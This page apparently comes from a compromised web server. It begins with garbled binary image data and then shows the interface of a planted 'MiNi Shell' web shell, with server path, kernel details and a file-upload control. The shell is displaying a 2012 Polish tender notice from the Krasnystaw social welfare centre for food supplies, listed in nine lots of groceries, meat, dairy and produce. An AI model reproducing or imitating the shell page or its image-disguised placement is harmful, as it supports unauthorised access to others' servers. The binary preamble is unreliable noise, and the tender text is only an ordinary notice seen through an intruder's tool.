JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/481558-N-2012.html

<p class="kh_header"><b>Krasnystaw: Zakup i dostawa artykułów spożywczych dla kuchni
Miejskiego Ośrodka Pomocy Społecznej w Krasnymstawie</b><br>
<b>Numer ogłoszenia: 481558 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krasnymstawie , ul. Piłsudskiego 9, 22-300 Krasnystaw, woj. lubelskie, tel. 82 5762324, 5762281, 5766900, faks 82 576 23 24.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów spożywczych dla kuchni
Miejskiego Ośrodka Pomocy Społecznej w Krasnymstawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zakup i dostawa artykułów spożywczych dla kuchni Miejskiego Ośrodka Pomocy Społecznej w Krasnymstawie, zestawionych w 9 zadaniach (częściach) przedstawionych poniżej:

Zadanie Nr 1 - Gotowe produkty mączne CPV 15851000-8
Zadanie Nr 2 - Pieczywo, świeże wyroby piekarskie CPV 15810000-9
Zadanie Nr 3 - Mięso i wędliny CPV 15131100-6
Zadanie Nr 4 - Nabiał CPV 15500000-3
Zadanie Nr 5 - Mrożonki, ryby mrożone CPV 15331170-9, CPV 15221000-3
Zadanie Nr 6 -Owoce i warzywa  CPV 15300000-1
Zadanie Nr 7 - Artykuły spożywcze w opakowaniach zbiorczych- garmażeryjnych
                          CPV 15800000-6
Zadanie Nr 8 - Artykuły spożywcze drobne CPV 15800000-6
Zadanie Nr 9 - Wyroby ciastkarskie i ciastka CPV 15812000-3
według wyszczególnienia zawartego w Formularzu cenowym, stanowiącym załącznik do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8, 15.81.00.00-9, 15.13.11.00-6, 15.50.00.00-3, 15.33.11.70-9, 15.22.10.00-3, 15.30.00.00-1, 15.80.00.00-6, 15.81.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów  i oświadczeń stosując formułę spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów  i oświadczeń stosując formułę spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów  i oświadczeń stosując formułę spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów  i oświadczeń stosując formułę spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków udziału w postępowaniu dokonana będzie przez Zamawiającego na podstawie  złożonych przez Wykonawców dokumentów  i oświadczeń stosując formułę spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty, Formularz cenowy, Podpisany wzór umowy, Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów zgodnie z odpisem z właściwego rejestru. Załączone do oferty pełnomocnictwo winno być w formie oryginału lub kopii poświadczonej notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia  w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji: przedłużenie lub skrócenie terminu zakończenia przedmiotu umowy może nastąpić w przypadkach: - wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy; ustawowej zmiany stawki podatku VAT.
Wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności takich zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krasnymstawie przy ul. Piłsudskiego 9, pokój nr 107.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Krasnymstawie przy ul. Piłsudskiego 9, pokój nr 107.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Gotowe produkty mączne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierogi ruskie-świeże (nie mrożone)	220 kg
Pierogi z kaszą gryczaną, świeże (nie mrożone)	70 kg
Pierogi z soczewicą - świeże (nie mrożone)	35 kg
Pierogi z kapustą- świeże (nie mrożone)	35 kg
Pierogi z kapustą i grzybami - świeże (nie mrożone)	70 kg
Pierogi z mięsem-świeże (nie mrożone)	70 kg
Kopytka- świeże (nie mrożone)	240 kg
Kluski śląskie- świeże (nie mrożone)	75 kg
Kluski leniwe- świeże (nie mrożone)	105 kg
Uszka z kapustą i grzybami - świeże (nie mrożone)	10 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.12.20-6, 15.31.00.00-4, 15.85.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo, świeże wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb zwykły 900g - krojony	3900 szt.
Chleb razowy 600g -krojony	800 szt.
Pączek z dżemem w pudrze	600 szt.
Drożdżówka z serem  100g	125 szt.
Drożdżówka z makiem  100g	125 szt.
Drożdżówka z jagodą  100g	125 szt.
Bułka 100g	940 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.81.11.00-7, 15.81.21.00-4, 15.61.25.00-6, 15.81.14.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żeberka- świeże (nie mrożone)	200 kg
Mięso gulaszowe - świeże (nie mrożone)	400kg
Kości pokrzepowe - świeże (nie mrożone)	1300 kg
Kiełbasa krakowska	25 kg
Kiełbasa zwyczajna	200 kg
Karczek wieprzowy b/k - świeże (nie mrożone)	210 kg
Schab b/k - świeże (nie mrożone)	400 kg
Słonina	80 kg
Boczek surowy	40 kg
Boczek wędzony	50 kg
Kaszanka	145 kg
Tuszonka 	24 kg
Mięso mielone wieprzowe świeże nie paczkowane (bez dodatków ulepszaczy)	800 kg
Wątroba wieprzowa - świeże (nie mrożone)	70 kg
Polędwica sopocka krojona	5 kg
Szynka gotowana krojona	5 kg
Szynka pieczona krojona	5 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.00-6, 15.13.14.00-9, 15.13.11.30-5, 15.13.11.34-3, 15.13.11.20-2, 15.13.14.10-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana 18%  400ml - 500 ml	875 l
Masło Extra- 200g 	120 kg
Mleko 2% 1l 	200 l
Twaróg kostka półtłusty 250g 	120 kg
Serek homogenizowany 125g	125 szt.
Ser żółty twardy 40%	25 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.22.00-2, 15.53.00.00-2, 15.51.14.00-7, 15.54.21.00-0, 15.88.10.00-7, 15.54.40.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mrożonki, ryby mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ćwiartka z kurczaka- mrożona	300 kg
Filet z kurczaka- mrożony	240 kg
Filet z dorsza bez skóry- mrożony	340 kg
Flaki wołowe suche krojone 1 kg- mrożone	120 kg
Brokuł 2,5 kg- mrożony	140 kg
Fasola szparagowa 2,5 kg- mrożona	320 kg
Kurczak- mrożony	210 kg
Kalafior 2,5 kg- mrożona	120 kg
Marchew kostka 2,5 kg- mrożona	30 kg
Marchew z groszkiem 2,5 kg- mrożona	250 kg
Mieszanka kompotowa 2,5 kg- mrożona	150 kg
Porcja rosołowa - mrożona	40 kg
Placki ziemniaczane 1,5kg - mrożone	140 kg
Płat śledziowy po wiejsku wiadro 2,5 kg	130 kg
Truskawka 2,5 kg- mrożona	180 kg
Pyzy z mięsem mrożone	85 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.22.10.00-3, 15.11.20.00-6, 15.22.90.00-6, 15.13.16.40-3, 15.33.11.70-9, 15.11.20.00-6, 15.33.11.70-9, 15.33.21.00-5, 15.31.00.00-4, 15.24.12.00-1, 15.31.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banan	90 kg
Burak czerwony	450 kg
Cebula	360 kg
Czosnek- główka	15 szt.
Fasola Jaś	160 kg
Jabłka	180 kg
Kapusta biała	850 kg
Kapusta czerwona	150 kg
Kapusta pekińska	200 kg
Kapusta kiszona	650 kg
Koperek zielony- pęczek	200 szt.
Natka z pietruszki- pęczek	60 szt.
Ogórek zielony	140 kg
Ogórek kiszony	200 kg
Papryka świeża	120 kg
Pomidor	155 kg
Por	320 kg
Pomarańcza	120 kg
Botwinka- pęczek	120 szt.
Rzodkiewka- pęczek	50 szt.
Sałata zielona	200 szt.
Szczypiorek- pęczek	150 szt.
Szczaw	50 kg
Pieczarka	300kg
Truskawka- świeża	20 kg
Seler	230 kg
Marchew	720 kg
Ziemniaki	7600 kg
Ziemniak młody	2500 kg
Cytryna	5 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.21.11-4, 03.22.11.11-7, 03.22.11.13-1, 03.22.11.00-7, 03.22.12.10-1, 03.22.23.21-9, 03.22.14.10-3, 03.22.12.70-9, 03.22.12.40-0, 03.22.22.20-5, 03.22.11.00-6, 03.22.13.10-2, 03.22.12.60-6, 03.22.23.13-0, 03.22.11.00-6, 03.22.11.12-4, 03.21.21.00-1, 03.22.22.20-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Artykuły spożywcze w opakowaniach zbiorczych - garmażeryjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czosnek granulowany 0,8kg 	4 szt.
Przyprawa do mięs 0,8kg 	10 szt.
FiX do gulaszu 1kg 	9 szt.
Galaretka 1 kg	50 szt.
Koperek suszony 0,23kg 	8 szt.
Koncentrat pomidorowy 30%  0,9kg 	210 szt.
Makaron świderki 2kg (100% durum)	150 kg
Makaron kolanko 2kg (100% durum)	20 kg
Makaron rurki 2kg (100% durum)	60 kg
Makaron kokardka 2,5kg (100% durum)	45 kg
Makaron nitka 2kg (100% durum)	120 kg
Makaron muszelka 2 kg 100% durum	60 kg
Napój (mix) 1,2kg 	90 szt.
Natka pietruszki suszona 0,90kg 	18 szt.
Przyprawa w płynie do zup 1,1l 	20 szt.
Ryż długoziarnisty 5kg 	72 szt.
Rosół z kury pasta 1,5kg 	46 szt.
Sos grzybowy 0,8kg 	3 szt.
Sos boloński. 0,8kg 	9 szt.
Sos sałatkowy koperkowy 0,9kg 	5 szt.
Sos sałatkowy ogrodowy 0,7 kg 	3 szt.
Zupa krem z pieczarek 0,9 kg 	2 szt.
Zupa brokułowa 1,3kg 	2 szt.
Zupa ogonowa 3kg 	4 szt.
Przyprawa do ryb 0,8kg 	3 szt.
Rosół wołowy pasta 0,5 kg 	18 szt.
Bulion grzybowy pasta 1 kg 	2 szt.
Sos sałatkowy włoski 1 kg 	3 szt.
Papryka słodka mielona 0,76 kg	2 szt.
Papryka ostra mielona 0,67 kg	1 szt.
Zioła prowasalskie 0,20 kg	4 szt.
Oregano 0,28kg	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.87.00.00-7, 15.87.12.00-6, 15.87.12.70-7, 15.33.22.40-8, 15.87.00.00-7, 15.33.11.34-5, 15.85.11.00-9, 15.32.17.00-1, 03.21.13.00-6, 15.89.40.00-1, 15.87.12.60-4, 15.89.10.00-0, 15.87.12.70-7, 15.87.23.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Artykuły spożywcze drobne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Smalec 200g kostka-700 szt.	
Bułka tarta 0,5 kg	430 szt.	
Cukier kryształ 1kg	750 kg	
Cukier waniliowy 32g 	60 szt.	
Chrzan 300g	20 szt.	
Groch łupany 0,5kg	 150 szt.	
Jaja świeże kurze	3300 szt.	
Kawa inka 150g	40 szt.	
Kasza jęczmienna 1kg 	180 kg	
Kasza gryczana 1kg 	175 kg	
Kukurydza konserwowa puszka 425ml 	80 szt.	
Kwasek cytrynowy 20g 	230 szt.	
Liść laurowy 6g 	130 szt.	
Koncentrat pomidorowy 30% 200g 	50 szt.	
Majonez 600ml - 700ml	80 szt.	
Przyprawa do flaków 20g	10 szt.	
Ogórek konserwowy 0,9 l słoik	200 szt.	
Mąka pszenna 1kg typ500 	540 kg	
Mąka ziemniaczana 0,5kg 	20 szt.	
Musztarda 200g	23 szt.	
Olej 1l uniwersalny	170 szt.	
Olej 3l uniwersalny	50 szt.	
Pieprz czarny mielony 15g 	180 szt.	
Pieprz ziołowy 30g 	130 szt.	
Sól kuchenna 1kg	370 kg	
Majeranek 16 g	140 szt.	
Sok syrop 500ml 	250 szt. 	
Przyprawa warzywna do potraw 200g 585 szt.	
Ziele angielskie 15g 	130 szt.	
Herbata granulowana 100g	30 szt.	
Susz owocowy 100g	40 szt.	
Kisiel owocowy 40 g	950 szt.	
Groszek konserwowy puszka 400ml	10 szt.	
Grzyby suszone 20g	60 szt.	
Przyprawa kebab-gyros 30g	6 szt.	
Ketchup pikantny 1l	5 szt.	
Koncentrat barszczu czerwonego 300ml	3 szt.	
Zupa grochowa 70g	10 szt.	
Kawa naturalna 250g	4 szt.	
Kawa rozpuszczalna 200g	4 szt.	
Śmietanka do kawy 10 x 10g	5 szt.	
Herbata expresowa A100 po 2g	4 szt.	
Woda mineralna gazowana 1,5l	60 szt.	
Woda mineralna niegazowana 1,5l	36 szt.
Sok 100% naturalny 2l	15 szt.
Paluszki solone 200 g - 300g	5 szt.
Paluszki z sezamem 200 g - 300g	5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.41.21.00-0, 15.81.10.00-6, 15.83.12.00-4, 15.08.00.00-5, 15.87.22.00-3, 03.21.22.00-2, 03.14.25.00-3, 15.86.12.00-3, 15.33.14.70-2, 15.87.00.00-7, 15.33.14.27-6, 15.87.12.73-8, 03.22.12.70-9, 15.61.21.00-2, 15.61.20.00-1, 15.87.12.50-1, 15.41.11.00-3, 15.87.21.00-2, 15.87.24.00-5, 15.32.17.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wyroby ciastkarskie i ciastka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ciastka drobne luz	 20 kg
Ciasto pieczone (blacha)	20 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.20.00-3, 15.81.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com